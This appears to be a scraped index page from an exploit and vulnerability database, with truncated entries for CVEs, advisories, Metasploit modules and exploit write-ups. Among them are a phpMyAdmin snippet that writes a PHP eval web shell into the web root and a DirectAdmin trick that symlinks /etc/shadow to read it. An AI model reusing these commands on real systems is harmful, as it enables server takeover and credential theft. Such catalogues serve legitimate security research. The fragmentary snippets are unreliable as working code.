Firefox XPCOM Execute Command

This module runs a shell command on the target OS without touching the disk. On Windows, this command will flash the command prompt momentarily. This can be avoided by setting WSCRIPT to true, which drops a jscript "launcher" to disk that hides the prompt. This module requires Metasploit:...

CVE-2013-3631

NAS4Free 9.1.0.1.804 and earlier allows remote authenticated users to execute arbitrary PHP code via a request to exec.php, aka the "Advanced | Execute Command" feature. NOTE: this issue might not be a vulnerability, since it appears to be part of legitimate, intentionally-exposed functionality b...

Design/Logic Flaw

NAS4Free 9.1.0.1.804 and earlier allows remote authenticated users to execute arbitrary PHP code via a request to exec.php, aka the "Advanced | Execute Command" feature. NOTE: this issue might not be a vulnerability, since it appears to be part of legitimate, intentionally-exposed functionality b...

NetWin SurgeFTP - (Authenticated) Admin Command Injection (Metasploit)

NetWin SurgeFTP - Authenticated Admin Command Injection Metasploit require 'msf/core' class Metasploit3 'SurgeFTP Remote Command Execution', 'Description' = %q This module exploits a flaw in the SurgeFTP server's web-based administrative console to execute arbitary commands. , 'Author' = 'Spencer...

Fantastico Multiple Vulnerabilities

Exploit for php platform in category web applications Title: Fantastico Multi Vulnerability Author: RAB3OUN Vendor Homepage: https://netenberg.com Software Link: https://netenberg.com/fantastico.php Version:All Bypass Safemode and Disablefunction 1 -------- exploit in index.php include...

logrotate: Multiple vulnerabilities

Background logrotate rotates, compresses, and mails system logs. Description Multiple vulnerabilities have been discovered in logrotate. Please review the CVE identifiers referenced below for details. Impact A local attacker could use this flaw to truncate arbitrary system file, to change file...

Apache Struts Remote Command Execution

This module exploits a remote command execution vulnerability in Apache Struts versions 'Apache Struts Remote Command Execution', 'Description' = %q This module exploits a remote command execution vulnerability in Apache Struts versions...

OS X x64 Execute Command

Execute an arbitrary command This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 31 include Msf::Payload::Single def initializeinfo = supermergeinfoinfo, 'Name' = 'OS X x64 Execute...

phpmyadmin get shell four ways to summarize and repair-vulnerability warning-the black bar safety net

Method one: CREATE TABLE mysql.study 7on TEXT NOT NULL ; INSERT INTO mysql.study 7on VALUES '? php @eval$POST7on?& gt;'; SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php'; ---- Or more simultaneously executed in the database: mysql create a table named: study, the field for the 7on, the 导出 到...

Apple Safari 4.0.5 parent.close() Code Execution

Tested on: Apple Safari 4.0.5 / XP SP2 Polish Shellcode: Windows Execute Command calc Local: Yes Remote: Yes POPUP must be enabled Ctrl+Shift+K Just for fun ; -- window.open"0day.htm"; //parent.close activation self.close;...

Apple Safari 4.0.5 parent.close() (memory corruption) 0day Code Execution Exploit

No description provided by source. !-- Apple Safari 4.0.5 parent.close memory corruption 0day Code Execution Exploit Bug discovered by Krystian Kloskowski h07 [email protected] Tested on: Apple Safari 4.0.5 / XP SP2 Polish Shellcode: Windows Execute Command calc Local: Yes Remote: Yes POPUP must be...

LDAP - Injection

Vurnerebility: LDAP Injection + Category : Implemented Web exploit + Category : Attack Technique + Author : mc2s3lector + dork : X/o" + Contact : www.yogyacarderlink.web.id + date : 4-2-10 + biGthank to : Allah SWT,jasakom,KeDai Computerworks,0n3-d4y n3ro,eplaciano, all.indonesian like a coding,...

DirectAdmin 1.33.6 - Symlink Security Bypass

Subject: DirectAdmin ln /etc/shadow to make symbolic link to shadow file in any dir after that go to Create/Restore Backups in direct and make Domains Directory: Backs up the backup file will be in /home/test/backups go there then Extract tar.gz file after extract go to...

Windows x64 Execute Command

Execute an arbitrary command Windows x64 This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 275 include Msf::Payload::Windows include Msf::Payload::Single def initializeinfo =...

DEBIAN-CVE-2008-3076

The Netrw plugin 125 in netrw.vim in Vim 7.2a.10 allows user-assisted attackers to execute arbitrary code via shell metacharacters in filenames used by the execute and system functions within the 1 mz and 2 mc commands, as demonstrated by the netrw.v2 and netrw.v3 test cases. NOTE: this issue...

IntelliTamper 2.07/2.08 (MAP File) Local SEH Overwrite Exploit

No description provided by source. !/usr/bin/python IntelliTamper 2.07/2.08 MAP File 0-day Local SEH Overwrite Exploit Bug discovered by cN4phux [email protected] Tested on: IntelliTamper 2.07/2.08 / win32 SP3 FR Shellcode: Windows Execute Command calc metasploit.com Here's the debugger output li...

IntelliTamper 2.07/2.08 (MAP File) Local SEH Overwrite Exploit

Exploit for unknown platform in category local exploits ============================================================== IntelliTamper 2.07/2.08 MAP File Local SEH Overwrite Exploit ============================================================== !/usr/bin/python IntelliTamper 2.07/2.08 MAP File 0-da...

IntelliTamper 2.07/2.08 (MAP File) 0-day Local SEH Overwrite Exploit

Hi webmaster, A nice Bug . . !/usr/bin/python IntelliTamper 2.07/2.08 MAP File 0-day Local SEH Overwrite Exploit Bug discovered by cN4phux [email protected] Tested on: IntelliTamper 2.07/2.08 / win32 SP3 FR Shellcode: Windows Execute Command calc metasploit.com Here's the debugger output like wha...

Fedora 8 : grip-3.2.0-24.fc8 (2008-9521)

Sun Nov 9 2008 Adrian Reber - 1:3.2.0-24 - fixed 'buffer overflow caused by large amount of CDDB replies' 470552 CVE-2005-0706 - Thu Oct 2 2008 Adrian Reber - 1:3.2.0-23 - fixed 'German Umlauts are shown incorrectly' 459394 not converting de.po and fr.po to UTF-8 anymore - Sat Aug 23 2008 Adrian...

Fedora 9 : grip-3.2.0-24.fc9 (2008-9604)

Sun Nov 9 2008 Adrian Reber - 1:3.2.0-24 - fixed 'buffer overflow caused by large amount of CDDB replies' 470552 CVE-2005-0706 - Thu Oct 2 2008 Adrian Reber - 1:3.2.0-23 - fixed 'German Umlauts are shown incorrectly' 459394 not converting de.po and fr.po to UTF-8 anymore - Sat Aug 23 2008 Adrian...